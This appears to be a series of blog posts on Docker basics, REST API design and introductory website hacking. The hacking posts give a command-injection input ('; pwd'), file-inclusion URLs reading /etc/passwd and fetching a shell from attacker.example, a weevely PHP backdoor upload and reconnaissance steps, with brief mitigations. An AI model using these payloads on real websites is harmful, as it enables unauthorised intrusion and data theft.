Dockerizing

To create an image we need a file called Dockerfile.

It is a sort of assembler of different pieces, and each of these pieces is a layer.

It also specifies how the image will be built.

SYNTAX

FROM

Each Dockerfile must start with FROM.

It specifies the image from which to start. For instance:

FROM alpine:latest

ARG

In some cases it is possible to define a variable to pass as an argument to the FROM command.

for instance:

ARG IMG_VERSION=latest
FROM alpine:${IMG_VERSION}

RUN

The RUN command allows executing one or more instructions, defined as shell commands, in a new layer, adding in this way an immutable block to the image.

CMD

CMD defines the default instruction to execute when the container runs.

Basically it means that when the container is run this instruction will be executed, and it is executed every time the container starts.

It looks like the RUN command, but the difference is that RUN is executed during the build, while CMD is not included in the build: it is executed every time the container is started.

Let’s try to create an image

Create a folder in which we will create our artifacts:

mkdir dockerfolder

Inside this folder create the file Dockerfile:

nano Dockerfile

and inside the file paste this content:

ARG VERSION=3.8

FROM alpine:$VERSION

LABEL maintainer="gf@fconsulting.tech"

# an ARG declared before FROM is not visible after FROM: re-declare it here
ARG VERSION

# RUN command in bash mode
RUN echo $VERSION

# RUN command in exec mode (no shell here, so $VERSION is printed literally, not expanded)
RUN ["echo", "$VERSION"]

CMD ["/bin/sh"]

Now let's stay in the folder containing the Dockerfile and execute the following command:

docker image build .

If everything went well, executing docker image ls you should find the new image.

To create the image with a name and a tag we should add -t to the build command, something like this:

docker image build . -t ourfirstimage:0.1
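
To verify it works, we can run a container from the new image; since its CMD is /bin/sh, the -it flags give us an interactive shell inside the container:

docker container run -it ourfirstimage:0.1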
Richardson Maturity Model

It is a model (developed by Leonard Richardson) that breaks down the principal elements of a REST approach into three steps: resources, HTTP verbs and hypermedia controls.

Level 0

The base step: a REST API application that uses HTTP as a transport layer and nothing else.

Level 1: Resources

In this case instead of calling a generic service we call a more specialised resource.

For instance, instead of calling "/bookHotel" and passing all information about our booking (hotel, dates, …) we should call "/book/hotel/date".

Level 2: HTTP verbs

At level 2 we use the HTTP methods correctly:

GET, to retrieve information (it also helps to manage client caching)

POST and PUT to create/update information; the only real difference is about idempotency:

  • PUT is idempotent: you can call the PUT service multiple times without creating the object multiple times (so theoretically for updates)
  • POST is not idempotent: if you call a POST service multiple times the object is created multiple times (so theoretically for inserts)

When a new object is created (with PUT or POST) the server has to reply with a 201 and a URL indicating where to get the new resource using GET.

Moreover the response code 409 seems a good choice to indicate that someone else has already updated the resource in an incompatible way. It’s better than a 200 with a message string.

Finally, DELETE should be used to remove objects.
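
A sketch of a level 2 exchange (the /bookings resource and its fields are hypothetical): the client creates a booking with POST and the server replies with 201 and the location of the new resource:

POST /bookings HTTP/1.1
Content-Type: application/json

{ "hotel": "Roma", "date": "2017-05-13" }

HTTP/1.1 201 Created
Location: /bookings/42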

Level 3: Hypermedia controls

At the 3rd level, the server not only sends back to the client the data or object state, but also links to other actions/services the client can call/use for that object.

For instance, if the client calls /book/hotel/date, the response could also contain the link to pay for that booking, or the link for the room details, and so on. This allows the client to be more independent from the URLs and services of the server.
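
A minimal sketch of such a response (fields and URLs are illustrative):

{
  "booking": { "hotel": "Roma", "date": "2017-05-13" },
  "links": [
    { "rel": "payment", "href": "/bookings/42/payment" },
    { "rel": "room-details", "href": "/bookings/42/room" }
  ]
}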

Docker CLI

List the images installed on your machine:

docker image ls

Download a Docker image:

docker image pull <docker image name>

Remove a Docker image:

docker image rm <docker image name or hash code>

Execute a container:

docker container run <docker image name>

Show running containers:

docker container ls

Show all containers, including those that are not running at the moment:

docker container ls --all

Remove a container:

docker container rm <container name>

Start and stop container:

docker container start <container name>
docker container stop <container name>
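
Putting a few of these together (using nginx as an example image, "web" as an arbitrary container name):

docker image pull nginx
docker container run --name web -d nginx
docker container ls
docker container stop web
docker container rm web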
Website hack – discovering vulnerabilities

File upload

The easiest type of vulnerability: a PHP, Python or other type of file can be uploaded and, once called, can act as a backdoor on the server machine.
For instance, if the server runs PHP, then through a program called weevely a PHP shell can be created (by weevely) and uploaded. From that moment it's enough to get the URL of the uploaded PHP shell and through weevely we can connect to the server (starting from the folder where the shell has been saved).

Command execution vulnerability

This type of vulnerability allows executing OS commands on the target server.

When a function in the webpage executes an OS command (a ping, for instance),
we can add a ";" after the expected input, appending a second command.
For instance, in a page that performs a ping, after the IP address we can add "; pwd".
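
To make it concrete (the IP address is just an example, and we assume the page wraps our input in a ping command), the server ends up executing two commands instead of one:

Input submitted: 10.0.2.4; pwd
Command executed by the server: ping -c 3 10.0.2.4; pwd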

Local/Remote file inclusion

It allows reading files outside the www directory.
When a webpage includes another page via a URL parameter, we can include, using a relative path, other files on the server, and their content will be displayed.
The same happens if the webserver allows including remote files. In that case we can include a file made by us, available remotely, which could contain a command that will be executed when the remote file is included.
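
Two illustrative URLs (target, parameter name and attacker host are hypothetical):

http://target.example/page.php?file=../../../../etc/passwd  (local file inclusion)
http://target.example/page.php?file=http://attacker.example/shell.txt  (remote file inclusion)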

Mitigation

File Upload

Always check the content type (and not the extension) of the uploaded file (images/media, …)

Code execution

Don't execute OS commands built from user input at all, or strictly filter the input.

File inclusion

Prevent remote file inclusion.
Use static file inclusion and not dynamic inclusion.

Docker Images

Docker Images (DI) are like classes in Java: they define a Docker container.

A DI is not one element: it is a set of (reusable) layers. Each layer is a service/program/OS/file.

For instance, when we pull an image we get a result like this:

giuseppefanuzzi@Giuseppes-MacBook-Pro ~ % docker pull mysql      
Using default tag: latest
latest: Pulling from library/mysql
46ef68baacb7: Pull complete
94c1114b2e9c: Pull complete
ff05e3f38802: Pull complete
41cc3fcd9912: Pull complete
07bbc8bdf52a: Pull complete
6d88f83726a9: Pull complete
cf5c7d5d33f7: Pull complete
9db3175a2a66: Pull complete
feaedeb27fa9: Pull complete
cf91e7784414: Pull complete
b1770db1c329: Pull complete
Digest: sha256:15f069202c46cf861ce429423ae3f8dfa6423306fbf399eaef36094ce30dd75c
Status: Downloaded newer image for mysql:latest
docker.io/library/mysql:latest

DIs are built in layers, and each layer receives an ID (SHA256).

Image IDs are SHA256 values derived from the SHA256 values of their layers.

DIs are immutable: once built, the files can't be modified.

Rather than by its hash value, an image is normally referred to by its "tag" name.

When we pull an image we normally specify its name and sometimes its tag.

For instance:
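
A docker image ls listing looks roughly like this (ID, date and size are placeholders and will differ on your machine):

REPOSITORY      TAG       IMAGE ID      CREATED       SIZE
hello-world     latest    <image id>    <created>     <size>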

The REPOSITORY column represents the name.

The image tag name is the pair NAME:TAG.

For instance “hello-world:latest”

Docker Hello world

After having installed Docker on your operating system (on Windows you need a Linux VM) we can try to say our first hello world by typing:

docker run hello-world

This will end up with a lot of interesting things to learn.

First of all, how to run a container: docker run <image name>

Then, in the output of this command we can see that, if the image is not found locally, the Docker client/runtime will try to download it from its repository (Docker Hub). Then it will create the container starting from the downloaded image.

The second time you execute the same command it will find the image locally, avoiding downloading it again.
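
The first run prints output similar to this (abridged):

Unable to find image 'hello-world:latest' locally
latest: Pulling from library/hello-world
...
Hello from Docker!
This message shows that your installation appears to be working correctly.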

Preliminary steps to get information about target website

Do you want to hack a website?

Follow these steps first, to gather some information about it.

Try to get the following:

  • IP address
  • Domain info
  • Technology used in the website (programming language, db, …)
  • Other websites on the same server
  • DNS records
  • Unlisted files, subdomains, etc.

IP address

We can start with a whois lookup (https://who.is/, https://whois.domaintools.com/) to find information about the domain and its owner.

Technologies

To know the technologies used on the website we can check with the Netcraft website (https://www.netcraft.com/tools/)

DNS record

To get DNS information use the website https://www.robtex.com/

Other websites on the same server

In some cases a website is hosted on a server which hosts many other websites. So if you can't get into your target website, you can try to attack some other website on that server. Basically all the websites on the same server have the same IP address.
robtex.com can show them. Bing can show them too: just search for the IP address of the target website and the results will list all the other websites hosted on the server.

Subdomain

Knowing the subdomains could help to find extra info about the target website.
To enumerate the subdomains we can use a Linux app called knock (you need Python installed).

git clone https://github.com/guelfoweb/knock.git
cd knock
pip3 install -r requirements.txt

python3 knockpy.py <targetwebsite>

And the result will be the list of all subdomains

Unlisted files and folder

Finding folders and files can be very helpful because they can contain users, passwords or other important and sensitive info.
To discover files and folders exposed on the website we can use a tool named "dirb". It's a Linux app which uses brute force to discover them: it has a list of names that will be used to find hidden folders and files.
This list from dirb contains many default file names like robots.txt (which can list files that the target website owner doesn't want indexed by search engines) or config.ini (which can contain the db configuration).
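
A typical invocation (the target URL is a placeholder; the wordlist path may vary per distribution):

dirb http://target.example/ /usr/share/dirb/wordlists/common.txt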

REST API Constraints

Is your architecture RESTful?

An architecture could be REST-like or RESTish.

To be RESTful an architecture should follow 6 rules, known as the RESTful Architecture Constraints:

  • Client – Server architectural principle
  • Uniform interface, that is the use of a well-defined communication contract between the client and the server
  • Statelessness, the server must not manage the state of the application
  • Caching, the server controls the caching of responses using HTTP headers
  • Layered system, multiple layers managed independently
  • Code on demand (optional), it means that the server could also send the client some code that the client can execute

Based on the rules above, an architecture can score on 4 levels, from 0 to 3 (the Richardson Maturity Model).

Client – Server

It's basically about the separation of concerns (SoC).

It’s an architectural principle used in programming to separate an application into units, with minimal overlapping between the functions of each individual unit.

So Client and Server are not sharing any code and they are not executed in the same process.

The Server doesn't call the Client directly, and vice versa. They are decoupled: there is no dependency between them.

Client and Server can change without impacting each other.

Uniform Interface

Client and server share a common technical interface.

An interface is a technical contract for communication between client and server; it says nothing about business constraints.

The contract is defined by HTTP methods and media types.

The advantage is that it decouples client and server totally. They are 100% technologically independent of each other.

The 4 guiding principles:

  1. identity of the resource (URI/URL), the client can call a URL to manipulate the resource
  2. representation of the resource, the data can be represented in a different format from how it is managed on the server side
  3. self-descriptive messages, request and response carry enough data to be processed (see the sketch after this list)
    • Server can use Content-Type, the HTTP status code, Host (which host is the response coming from)
    • Client can use Accept.
  4. Hypermedia, it means that the server sends back to the client not only the data but also the actions that the client can execute (known as HATEOAS)
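
A sketch of a self-descriptive exchange (resource and host are hypothetical):

GET /bookings/42 HTTP/1.1
Host: api.example.com
Accept: application/json

HTTP/1.1 200 OK
Content-Type: application/json

{ "hotel": "Roma", "date": "2017-05-13" }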

Statelessness

Each client request is independent.

The server receives all the info it needs from the client request.
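
For example, every request carries its own credentials and context, so the server doesn't need to keep a session (the token is a placeholder):

GET /bookings/42 HTTP/1.1
Host: api.example.com
Authorization: Bearer <token>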

Caching

A typical web application can have multiple levels of caching.

Local cache, the one managed by the browser.

Shared cache on the gateway and on the application server

The advantages are performance and scalability.

Response messages should be explicitly marked as cacheable or non-cacheable.

Caching is managed by the server through the HTTP headers.

Cache-Control header

Cache policy directives: who, how long, under what conditions. Ex:

Cache-Control: private, max-age=120

It means that only the client's private cache (the browser) can store the response, and only for 120 seconds.

Expires header

This header specifies a fixed date/time for the expiration of a cached resource. For example, 

Expires: Sat, 13 May 2017 07:00:00 GMT 

means that the cached resource expires on May 13, 2017 at 7:00 am GMT

ETag

A response header that identifies the version of served content according to a token – a string of characters in quotes, e.g., "675af34563dc-tr34" – that changes after a resource is modified. If the token is unchanged before a request is made, the browser continues to use its local version.

Layered System

A client-server architecture consists of multiple layers. It's a one-way path: a layer can't communicate with the previous layer.

Layers can be moved, added, or deleted based on needs.

What is Docker

Welcome to the world of Docker, where containerization transforms the way we develop, ship, and manage applications.

In this beginner-friendly post, we’ll embark on a journey to understand the fundamental concepts of Docker, setting up Docker on different platforms, and exploring its real-world applications. By the end of this session, you’ll have a solid grasp of what Docker is and how it can revolutionize your software development process.

Understanding Containerization

Containerization is like magic for software developers. It allows you to package an application and its dependencies into a single unit, known as a container. Think of it as a self-contained box that holds everything your app needs to run smoothly, from libraries to system tools. Containers are lightweight, efficient, and highly portable.

A container is

  • an isolated runtime inside of Linux
  • a private space under Linux
  • able to run under any modern Linux kernel

This container has

  • its own process space
  • its own network interface
  • its own disk space

It runs as root (inside the container).

Docker vs. Traditional Virtualization

Before Docker, virtualization was the go-to method for running multiple applications on a single server. However, it had its drawbacks. Virtual machines (VMs) are resource-intensive and slower to start. Docker containers, on the other hand, are much more lightweight, as they share the host OS kernel, making them faster and more efficient.

Use Cases for Docker

Docker is incredibly versatile and finds applications across various industries. It’s used for software development, testing, and production deployments. Whether you’re a developer, system administrator, or data scientist, Docker can streamline your workflow and simplify application management.

Setting up Docker

Installing Docker on Various Platforms

Getting started with Docker is easy, regardless of your operating system. Docker provides installation packages for Windows, macOS, and Linux. It’s a matter of a few clicks or commands to have Docker up and running on your machine.

To install Docker on your machine check this post.

Exploring Docker Desktop (for Windows and macOS)

For Windows and macOS users, Docker Desktop is a user-friendly tool that simplifies container management. It provides a graphical interface to manage containers, images, and more. It’s a great starting point for those new to Docker.

Docker Versioning and Compatibility

Docker evolves rapidly, with frequent updates and new features. It’s important to understand Docker’s versioning and compatibility matrix to ensure that your containers work seamlessly across different environments.

Docker terminology

Docker Image, the representation of a Docker container. For instance, like a JAR or WAR.

Docker Container, the Docker runtime unit. Basically a deployed and running Docker image, i.e. the instance of the Docker image.

Docker Engine, the code which manages Docker stuff. It creates and runs Docker containers.

Docker Editions

Docker Enterprise and Community editions

Docker Enterprise is a CaaS (Container as a Service) platform subscription (paid).

Docker Community is a free Docker edition


Question 1: What is containerization?

a) A process of shipping physical containers with software inside
b) A way to package applications and their dependencies
c) A type of virtual machine
d) A tool for managing servers

Correct answer: b) A way to package applications and their dependencies

Question 2: What is a key advantage of Docker containers over traditional virtual machines?

a) Docker containers are more secure
b) Docker containers are larger in size
c) Docker containers share the host OS kernel
d) Docker containers have a GUI

Correct answer: c) Docker containers share the host OS kernel

Question 3: Which of the following is NOT a common use case for Docker?

a) Simplifying application deployment
b) Creating virtual machines
c) Building and testing applications
d) Scaling applications on-demand

Correct answer: b) Creating virtual machines

Question 4: Which platforms does Docker provide installation packages for?

a) Windows, macOS, Linux
b) Windows only
c) macOS only
d) Linux only

Correct answer: a) Windows, macOS, Linux

Question 5: What is Docker Desktop primarily used for?

a) Creating virtual machines
b) Managing Docker containers and images
c) Writing code
d) Playing games

Correct answer: b) Managing Docker containers and images

Question 6: Why is it essential to be aware of Docker’s versioning and compatibility?

a) To ensure your containers work consistently across environments
b) To track the stock market
c) To play the latest video games
d) To learn about new Docker features

Correct answer: a) To ensure your containers work consistently across environments

What is an API

APIs (Application Programming Interfaces) are like user interfaces, but targeted to be consumed by other applications rather than humans.

This interface defines a contract between provider and consumer.

A contract is the exact structure of the request and the response.
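
A minimal sketch of such a contract (resource and fields are hypothetical):

Request:  GET /customers/42
Response: { "id": 42, "name": "Mario Rossi" }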

A bit of history: API formats

The first API formats were:

  • XML RPC (Remote Procedure Call)
  • XML SOAP (Simple Object Access Protocol)

Problem

But … XML is heavy in terms of network traffic, so you couldn’t have large payloads crossing over from the webserver to the clients.

XML parsing is CPU and memory intensive

REST Json

Because of the previous problems a new exchange format started to be used:

REST (Representational State Transfer) + JSON (JavaScript Object Notation)

RESTful

REST stands for REpresentational State Transfer. The state is the set of attributes that an object/thing/entity has in a certain moment; this state is managed by a backend system.

REST is not a specific technology and it is not a standard.

An API is RESTful when it has been built using the RESTful architectural style and follows the principles for RESTful APIs.

HTTP is the preferred protocol to use APIs with.

TYPES OF API

REST API Consumer

  • Private or Internal (part of the same organization)
  • Public or External (outside of the organization)
  • Partner (trusted relationship with the organization)

REST API TYPES

  • Private API, for private consumers
  • Public/External API, for public/external consumers
  • Partner API, for partner consumers

There is no particular difference in coding or designing these different APIs. What changes is that they need different approaches to the management of security, documentation, access requests and SLAs.

API Security

Private API, consumers are internal and so known (trusted developers). So we can use:

  • Basic auth
  • proprietary schemes

For public and partner APIs it's not possible to trust the developers, so we can use:

  • key/secret
  • OAuth

Documentation

In the case of partner and private APIs we are in a "controlled environment", so no formal documentation is needed.

For public APIs we talk about an uncontrolled environment: informal documentation is not enough, so we need to publish the documentation on a developer portal (which is a good practice for the other types too).

Access Request

For private and partner APIs, because of the controlled environment, access can be requested through emails or an internal ticketing process.

In the case of public APIs, an uncontrolled environment, it's a good idea to handle access requests through a developer portal (which is a good practice for the other types too).

SLA Management

SLA stands for Service Level Agreement, and specifies which service to expect from a service provider and under which conditions.

Because APIs are a sort of contract, consumer and provider have to agree on the quality and conditions of the service, for instance: uptime 99%, throughput 20 calls per second, and support by email.